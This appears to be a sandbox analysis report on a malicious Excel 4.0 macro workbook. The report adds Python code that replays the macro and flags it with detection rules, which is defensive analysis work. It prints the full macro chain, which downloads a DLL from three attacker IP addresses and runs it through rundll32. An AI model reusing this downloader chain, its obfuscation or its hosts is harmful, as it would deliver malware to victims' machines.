Data Raw: 93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 146
Stream Path: VBA/__SRP_1
File Type: data
Stream Size: 146
Entropy: 1.48909835582
Base64 Encoded: False
Data ASCII: r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
Data Raw: 72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff
Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 170
Stream Path: VBA/__SRP_2
File Type: data
Stream Size: 170
Entropy: 1.65437585425
Base64 Encoded: False
Data ASCII: r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . 2 . . . . . . . . . . . . . . .
Data Raw: 72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 0c 00 00 00 00 00 00 12 00 00
Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 156
Stream Path: VBA/__SRP_3
File Type: data
Stream Size: 156
Entropy: 1.63365900945
Base64 Encoded: False
Data ASCII: r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
Data Raw: 72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
Stream Path: VBA/dir, File Type: data, Stream Size: 601
Stream Path: VBA/dir
File Type: data
Stream Size: 601
Entropy: 6.45605461621
Base64 Encoded: True
Data ASCII: . U . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . O ~ b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
Data Raw: 01 55 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 a6 4f 7e 62 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
Stream Path: VBA/\x1051\x1080\x1089\x10901, File Type: data, Stream Size: 990
Stream Path: VBA/\x1051\x1080\x1089\x10901
Decoded name: Лист1 (the report escapes non-ASCII as \x followed by the decimal code point: 1051 1080 1089 1090 = U+041B U+0438 U+0441 U+0442; Лист1 is the Russian-locale default for Sheet1)
File Type: data
Stream Size: 990
Entropy: 3.19675892958
Base64 Encoded: True
Data ASCII: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw: 01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 1e a1 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Stream Path: VBA/\x1051\x1080\x1089\x10902, File Type: data, Stream Size: 990
Stream Path: VBA/\x1051\x1080\x1089\x10902
Decoded name: Лист2 (Cyrillic, escaped by the report as \x plus the decimal code point; the Russian-locale default for Sheet2)
File Type: data
Stream Size: 990
Entropy: 3.19281939975
Base64 Encoded: True
Data ASCII: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw: 01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc b2 ae 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Stream Path: VBA/\x1069\x1090\x1072\x1050\x1085\x1080\x1075\x1072, File Type: data, Stream Size: 994
Stream Path: VBA/\x1069\x1090\x1072\x1050\x1085\x1080\x1075\x1072
Decoded name: ЭтаКнига (code points 1069 1090 1072 1050 1085 1080 1075 1072 = U+042D U+0442 U+0430 U+041A U+043D U+0438 U+0433 U+0430; the Russian-locale default for ThisWorkbook)
File Type: data
Stream Size: 994
Entropy: 3.21355105334
Base64 Encoded: True
Data ASCII: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . R . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw: 01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 52 09 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Macro 4.0 Code

Cell contents as dumped by the sandbox. The dump prints no cell addresses; empty cells are omitted here and each non-empty cell is shown on its own line, in dump order. Three sheets are referenced: Nyukasl, Blodas and Jioka.

1
9
=ON.TIME(NOW()+"00:00:02","Milolos")
=NOW()
=FORMULA(AH84&AH85&AH86,AJ76)
=HALT()
=CONCATENATE(AH79,AI71,AH77,AH78)
=CONCATENATE(AH80,AI71,AH77,AH78)
=CONCATENATE(AH81,AI71,AH77,AH78)
uRlMon
.d
JJCCBB
at
Belandes
="http://185.45.193.80/"
http://82.118.21.70/
=GOTO(Blodas!G6)
http://45.144.31.232/
..\Niolas.dll
="UR"
="LDownloadT"
="oFileA"
=REGISTER(Nyukasl!AJ75,Nyukasl!AJ76,Nyukasl!AJ77,Nyukasl!AJ78,,Nyukasl!AJ68,9)
=Belandes(0,Nyukasl!AH73,Nyukasl!AJ81,0,0)
=IF(G12<0, Belandes(0,Nyukasl!AH74,Nyukasl!AJ81,0,0))
=IF(G13<0, Belandes(0,Nyukasl!AH75,Nyukasl!AJ81,0,0))
=IF(G14<0,CLOSE(0),)
=GOTO(Jioka!H4)
="rund"
="ll32 ..\Niolas.dll"
=",DllRegisterServer"
=PI()
=EXEC(I7&I9&I10)
=PI()
=HALT()

What the chain does: ON.TIME defers the real entry point, "Milolos", until two seconds after the workbook opens. FORMULA writes "UR"&"LDownloadT"&"oFileA", i.e. URLDownloadToFileA, into AJ76, and REGISTER imports that export from urlmon.dll (written as uRlMon, presumably to dodge naive string matching) under the alias Belandes with type text JJCCBB (32-bit integer return, then integer, string, string and two numeric arguments). Each CONCATENATE builds "<host>/" & NOW() & ".d" & "at", so the requested file name is a date serial that changes on every run. The three Belandes calls try the hosts in order: IF(G12<0, ...) only falls through to the next host when the previous URLDownloadToFileA returned a negative HRESULT, and IF(G14<0,CLOSE(0),) closes the workbook without any visible error if all three fail. On success, GOTO(Jioka!H4) reaches EXEC(I7&I9&I10), which is rundll32 ..\Niolas.dll,DllRegisterServer, loading the dropped DLL from the directory above the workbook's folder. The =PI() cells are filler and =HALT() ends the macro.
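The chain above can be replayed offline. The following Python is an added example written for this page, not code from the report or from the sample: it transcribes the string fragments from the dump into a cell table, evaluates the FORMULA, CONCATENATE, & and NOW() expressions the macro uses, and steps through the REGISTER, download-fallback and EXEC logic with a caller-supplied stand-in for URLDownloadToFileA. The cell coordinates are inferred from the formulas' cross-references and are an assumption, as is the comma decimal separator for the NOW() serial (it depends on the victim's locale). The two download callbacks in the demo are hypothetical and model the two outcomes: every host fails, which is what this sandbox run saw (the two answering servers returned 403 and 82.118.21.70 never completed a handshake), and one host serving the DLL.

```python
import re
from datetime import datetime

# Cell contents transcribed from the Macro 4.0 dump above, sheet prefixes
# dropped. The dump prints no cell addresses, so the coordinates below are
# inferred from the formulas' cross-references (FORMULA(AH84&AH85&AH86,AJ76),
# Belandes(0,AH73,AJ81,0,0), EXEC(I7&I9&I10)); treat the coordinates, not the
# strings, as an assumption.
CELLS = {
    "AH77": ".d", "AH78": "at",
    "AH79": "http://185.45.193.80/",
    "AH80": "http://82.118.21.70/",
    "AH81": "http://45.144.31.232/",
    "AH84": '="UR"', "AH85": '="LDownloadT"', "AH86": '="oFileA"',
    "AI71": "=NOW()",
    "AJ68": "1",            # REGISTER macro_type: 1 = function
    "AJ75": "uRlMon",       # REGISTER module_text (DLL name)
    "AJ77": "JJCCBB",       # REGISTER type_text: int return; int, str, str, num, num
    "AJ78": "Belandes",     # REGISTER function_text: the alias the sheet calls
    "AJ81": r"..\Niolas.dll",
    "I7": '="rund"', "I9": r'="ll32 ..\Niolas.dll"', "I10": '=",DllRegisterServer"',
}
SANDBOX_CLOCK = datetime(2021, 5, 4, 6, 2, 39)   # first SYN in the packet list below
REF = re.compile(r"(?:[A-Za-z]+!)?([A-Z]{1,2}\d+)")


def excel_serial(ts):
    """Excel 1900 date system: days since 1899-12-30 plus the fraction of the day."""
    d = ts - datetime(1899, 12, 30)
    return d.days + d.seconds / 86400


def cell(cells, ref, now):
    v = cells[REF.fullmatch(ref).group(1)]
    return evaluate(cells, v, now) if v.startswith("=") else v


def evaluate(cells, formula, now):
    """The subset of XLM string expressions this macro uses: ="literal", NOW(),
    A&B&C concatenation and CONCATENATE(A,B,...) over cell references."""
    body = formula[1:]
    if body == "NOW()":
        # Excel renders the serial with the host locale's decimal separator; a
        # comma is assumed here, so the requested file name changes every run.
        return str(round(excel_serial(now), 10)).replace(".", ",")
    lit = re.fullmatch(r'"(.*)"', body)
    if lit:
        return lit.group(1)
    call = re.fullmatch(r"CONCATENATE\((.*)\)", body)
    parts = call.group(1).split(",") if call else body.split("&")
    return "".join(cell(cells, p.strip(), now) for p in parts)


def run_macro(cells, download, now):
    """Replay the macro's control flow. `download(url, path)` stands in for the
    REGISTERed URLDownloadToFileA and returns an HRESULT-like int: 0 (S_OK) on
    success, negative on failure, which is what the IF(G12<0, ...) cells test."""
    cells = dict(cells)
    trace = {"registered": None, "attempts": [], "closed": False, "exec": None}
    # =FORMULA(AH84&AH85&AH86,AJ76): assemble the export name inside the sheet
    cells["AJ76"] = evaluate(cells, "=AH84&AH85&AH86", now)
    # =REGISTER(AJ75,AJ76,AJ77,AJ78,,AJ68,9): import urlmon!URLDownloadToFileA as Belandes
    trace["registered"] = (cells["AJ75"].lower(), cells["AJ76"], cells["AJ78"])
    # =CONCATENATE(AHnn,AI71,AH77,AH78) -> AH73..AH75: "<host>/<NOW serial>.dat"
    for dst, host in (("AH73", "AH79"), ("AH74", "AH80"), ("AH75", "AH81")):
        cells[dst] = evaluate(cells, f"=CONCATENATE({host},AI71,AH77,AH78)", now)
    # =Belandes(0,AH73,AJ81,0,0), then =IF(G12<0,Belandes(0,AH74,...)), =IF(G13<0,...)
    hr = -1
    for ref in ("AH73", "AH74", "AH75"):
        hr = download(cells[ref], cells["AJ81"])
        trace["attempts"].append((cells[ref], hr))
        if hr >= 0:
            break
    if hr < 0:
        trace["closed"] = True        # =IF(G14<0,CLOSE(0),): give up quietly
        return trace
    # =GOTO(Jioka!H4) -> =EXEC(I7&I9&I10): run the dropped DLL through rundll32
    trace["exec"] = evaluate(cells, "=I7&I9&I10", now)
    return trace


if __name__ == "__main__":
    # What this sandbox saw: every host failed (403 or no answer), so the workbook closed.
    print(run_macro(CELLS, lambda url, path: -2147467259, SANDBOX_CLOCK))
    # What a victim sees when the second host serves the DLL.
    print(run_macro(CELLS, lambda url, path: 0 if "82.118.21.70" in url else -1, SANDBOX_CLOCK))
```

Because the URL carries a NOW() serial, neither the file name nor a URL hash is a usable indicator; the hosts, the ..\Niolas.dll drop path and the rundll32 ...,DllRegisterServer command line are the stable parts of this chain.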

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID   Message                         Source Port  Dest Port  Source IP      Dest IP
05/04/21-05:56:49.914165  TCP       1201  ATTACK-RESPONSES 403 Forbidden  80           49165      185.45.193.80  192.168.2.22
05/04/21-05:57:32.232736  TCP       1201  ATTACK-RESPONSES 403 Forbidden  80           49168      45.144.31.232  192.168.2.22

Network Port Distribution (chart; not reproduced in this text)

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP      Dest IP
May 4, 2021 06:02:39.392879009 CEST  49720        80         192.168.2.6    185.45.193.80
May 4, 2021 06:02:39.444907904 CEST  80           49720      185.45.193.80  192.168.2.6
May 4, 2021 06:02:39.448081970 CEST  49720        80         192.168.2.6    185.45.193.80
May 4, 2021 06:02:39.448817968 CEST  49720        80         192.168.2.6    185.45.193.80
May 4, 2021 06:02:39.499607086 CEST  80           49720      185.45.193.80  192.168.2.6
May 4, 2021 06:02:39.706553936 CEST  80           49720      185.45.193.80  192.168.2.6
May 4, 2021 06:02:39.710957050 CEST  49720        80         192.168.2.6    185.45.193.80
May 4, 2021 06:02:39.717806101 CEST  49721        80         192.168.2.6    82.118.21.70
May 4, 2021 06:02:42.778491974 CEST  49721        80         192.168.2.6    82.118.21.70
May 4, 2021 06:02:48.779213905 CEST  49721        80         192.168.2.6    82.118.21.70
May 4, 2021 06:03:00.952579975 CEST  49729        80         192.168.2.6    45.144.31.232
May 4, 2021 06:03:01.034195900 CEST  80           49729      45.144.31.232  192.168.2.6
May 4, 2021 06:03:01.034440041 CEST  49729        80         192.168.2.6    45.144.31.232
May 4, 2021 06:03:01.035176039 CEST  49729        80         192.168.2.6    45.144.31.232
May 4, 2021 06:03:01.116686106 CEST  80           49729      45.144.31.232  192.168.2.6
May 4, 2021 06:03:01.127298117 CEST  80           49729      45.144.31.232  192.168.2.6
May 4, 2021 06:03:01.127418041 CEST  49729        80         192.168.2.6    45.144.31.232
May 4, 2021 06:03:44.719959021 CEST  80           49720      185.45.193.80  192.168.2.6
May 4, 2021 06:03:44.720206022 CEST  49720        80         192.168.2.6    185.45.193.80
May 4, 2021 06:04:06.127988100 CEST  80           49729      45.144.31.232  192.168.2.6
May 4, 2021 06:04:06.128079891 CEST  49729        80         192.168.2.6    45.144.31.232
May 4, 2021 06:04:20.672466993 CEST  49729        80         192.168.2.6    45.144.31.232
May 4, 2021 06:04:20.672898054 CEST  49720        80         192.168.2.6    185.45.193.80
May 4, 2021 06:04:20.723043919 CEST  80           49720      185.45.193.80  192.168.2.6
May 4, 2021 06:04:20.753931999 CEST  80           49729      45.144.31.232  192.168.2.6
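The packet list follows the macro's host order exactly: 185.45.193.80 completes a handshake and answers, 82.118.21.70 gets three unanswered SYNs (the 3 s and 6 s gaps are Windows' SYN retransmission timers) and after the connect timeout the macro moves on to 45.144.31.232. The only IDS hits are generic "403 Forbidden" signatures on the server replies, which is a weak signal on its own. A behavioural detection of the chain is more robust. The following Python is an added example, not part of the report: it runs two rules over constructed Sysmon-style events (ProcessCreate and NetworkConnect; the field names follow Sysmon's schema, the values are made up, including a rundll32 launch that never happened in this sandbox because every download failed) and then correlates the two by PID. The "bare IP" test uses DestinationHostname as a stand-in; on real telemetry, correlate against Sysmon DNS query events (EventID 22) instead.

```python
import ipaddress
import ntpath
import re

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
RUNDLL32 = re.compile(
    r'^"?(?:[^"\s]*\\)?rundll32(?:\.exe)?"?\s+"?(?P<dll>[^",]+?)"?\s*,\s*(?P<export>\w+)',
    re.IGNORECASE)

EXCEL = r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE"
# Constructed Sysmon-style events, not taken from the report. Field names follow
# Sysmon's ProcessCreate (EventID 1) and NetworkConnect (EventID 3) schema; PIDs,
# the benign connection and the rundll32 launch (which never happened in the
# sandbox because every download failed) are made up for the example.
EVENTS = [
    {"EventID": 1, "ProcessId": 6340, "ParentProcessId": 812, "Image": EXCEL,
     "CommandLine": f'"{EXCEL}" /automation -Embedding',
     "CurrentDirectory": r"C:\Users\user\Documents"},
    {"EventID": 3, "ProcessId": 6340, "Image": EXCEL, "Protocol": "udp",
     "DestinationIp": "8.8.8.8", "DestinationPort": 53, "DestinationHostname": ""},
    {"EventID": 3, "ProcessId": 6340, "Image": EXCEL, "Protocol": "tcp",
     "DestinationIp": "185.45.193.80", "DestinationPort": 80, "DestinationHostname": ""},
    {"EventID": 3, "ProcessId": 6340, "Image": EXCEL, "Protocol": "tcp",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443,
     "DestinationHostname": "cdn.example.com"},
    {"EventID": 1, "ProcessId": 7104, "ParentProcessId": 6340, "ParentImage": EXCEL,
     "Image": r"C:\Windows\SysWOW64\rundll32.exe",
     "CommandLine": r"rundll32 ..\Niolas.dll,DllRegisterServer",
     "CurrentDirectory": r"C:\Users\user\Documents"},
    {"EventID": 1, "ProcessId": 7150, "ParentProcessId": 6340, "ParentImage": EXCEL,
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
     "CurrentDirectory": r"C:\Users\user\Documents"},
]


def resolve_rundll32(cmdline, cwd):
    """Return (absolute DLL path, export) for a rundll32 command line, else None.
    A relative module path is resolved against the current directory, which the
    child inherits from Excel; that is how '..\\Niolas.dll' lands one level above
    the folder the workbook was opened from."""
    m = RUNDLL32.match(cmdline.strip())
    if not m:
        return None
    dll = m.group("dll")
    if not ntpath.isabs(dll):
        dll = ntpath.normpath(ntpath.join(cwd, dll))
    return dll, m.group("export")


def detect(events):
    """Two behavioural rules for the chain in the macro, then a PID correlation:
    (1) an Office process talks HTTP(S) to a public IP with no name attached,
    (2) an Office process launches rundll32 on a DLL outside %SystemRoot%."""
    office_pids = {e["ProcessId"] for e in events if e["EventID"] == 1
                   and ntpath.basename(e["Image"]).lower() in OFFICE_APPS}
    findings = []
    for e in events:
        if (e["EventID"] == 3 and e["ProcessId"] in office_pids
                and e.get("Protocol") == "tcp" and e.get("DestinationPort") in (80, 443, 8080)
                and not e.get("DestinationHostname")   # stand-in: use EventID 22 DNS data in practice
                and ipaddress.ip_address(e["DestinationIp"]).is_global):
            findings.append(("office_http_to_bare_ip", e["ProcessId"], e["DestinationIp"]))
        elif e["EventID"] == 1 and e.get("ParentProcessId") in office_pids:
            hit = resolve_rundll32(e["CommandLine"], e.get("CurrentDirectory", "C:\\"))
            if hit and not hit[0].lower().startswith("c:\\windows\\"):
                findings.append(("office_spawns_rundll32_user_dll", e["ProcessId"], f"{hit[0]},{hit[1]}"))
    # Correlate: the rundll32 child's parent is the same Excel that fetched from a bare IP.
    downloaders = {pid for rule, pid, _ in findings if rule == "office_http_to_bare_ip"}
    parents = {e["ProcessId"]: e.get("ParentProcessId") for e in events if e["EventID"] == 1}
    for rule, pid, detail in list(findings):
        if rule == "office_spawns_rundll32_user_dll" and parents.get(pid) in downloaders:
            findings.append(("download_then_rundll32_chain", parents[pid], detail))
    return findings


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(*finding)
```

The rundll32 rule deliberately keys on the resolved DLL location rather than on the export name: DllRegisterServer is also what regsvr32 and legitimate installers call, but a DLL one directory above a user's Documents folder, launched by Excel, has no benign explanation.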

                                                                                                                                                    UDP Packets


HTTP Request Dependency Graph

• 185.45.193.80
• 45.144.31.232

HTTP Packets

Session ID: 0
Source IP: 192.168.2.6
Source Port: 49720
Destination IP: 185.45.193.80
Destination Port: 80
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp: May 4, 2021 06:02:39.448817968 CEST
kBytes transferred: 1263
Direction: OUT
Data:
GET /44313,6048108796.dat HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 185.45.193.80
Connection: Keep-Alive

Timestamp: May 4, 2021 06:02:39.706553936 CEST
kBytes transferred: 1268
Direction: IN
Data:
HTTP/1.1 403 Forbidden
Server: nginx
Date: Tue, 04 May 2021 04:02:39 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 1
Source IP: 192.168.2.6
Source Port: 49729
Destination IP: 45.144.31.232
Destination Port: 80
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp: May 4, 2021 06:03:01.035176039 CEST
kBytes transferred: 1384
Direction: OUT
Data:
GET /44313,6048108796.dat HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 45.144.31.232
Connection: Keep-Alive

Timestamp: May 4, 2021 06:03:01.127298117 CEST
kBytes transferred: 1385
Direction: IN
Data:
HTTP/1.1 403 Forbidden
Server: nginx
Date: Tue, 04 May 2021 04:03:01 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

System Behavior

General

Start time: 06:02:28
Start date: 04/05/2021
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase: 0x1320000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Call Graph

Graph

Call graph (2 nodes from entrypoint): Auto_Open calls Run (3 times) and Range (3 times)

Module: Byutut

Declaration
Line  Content
1     Attribute VB_Name = "Byutut"

Executed Functions
APIs   Meta Information
Run    Microsoft Excel:Application.Run()
Range
Run
Range
Run
Range

Strings     Decrypted Strings
"AM5"
"Nyukasl"
"A5"
"Nyukasl"
"A5"
"Nyukasl"

Line  Instruction                                      Meta Information
5     Public Function Auto_Open()
7     Application.Run Sheets("Nyukasl").Range("AM5")   Microsoft Excel:Application.Run(), Range, executed
9     Application.Run Sheets("Nyukasl").Range("A5")    Run, Range
10    Application.Run Sheets("Nyukasl").Range("A5")    Run, Range
14    End Function

Module: Class1

Declaration
Line  Content
1     Attribute VB_Name = "Class1"
2     Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
3     Attribute VB_GlobalNameSpace = False
4     Attribute VB_Creatable = False
5     Attribute VB_PredeclaredId = False
6     Attribute VB_Exposed = False
7     Attribute VB_TemplateDerived = False
8     Attribute VB_Customizable = False

Module: Лист1

Declaration
Line  Content
1     Attribute VB_Name = "Лист1"
2     Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3     Attribute VB_GlobalNameSpace = False
4     Attribute VB_Creatable = False
5     Attribute VB_PredeclaredId = True
6     Attribute VB_Exposed = True
7     Attribute VB_TemplateDerived = False
8     Attribute VB_Customizable = True

Module: Лист2

Declaration
Line  Content
1     Attribute VB_Name = "Лист2"
2     Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3     Attribute VB_GlobalNameSpace = False
4     Attribute VB_Creatable = False
5     Attribute VB_PredeclaredId = True
6     Attribute VB_Exposed = True
7     Attribute VB_TemplateDerived = False
8     Attribute VB_Customizable = True

Module: ЭтаКнига

Declaration
Line  Content
1     Attribute VB_Name = "ЭтаКнига"
2     Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3     Attribute VB_GlobalNameSpace = False
4     Attribute VB_Creatable = False
5     Attribute VB_PredeclaredId = True
6     Attribute VB_Exposed = True
7     Attribute VB_TemplateDerived = False
8     Attribute VB_Customizable = True
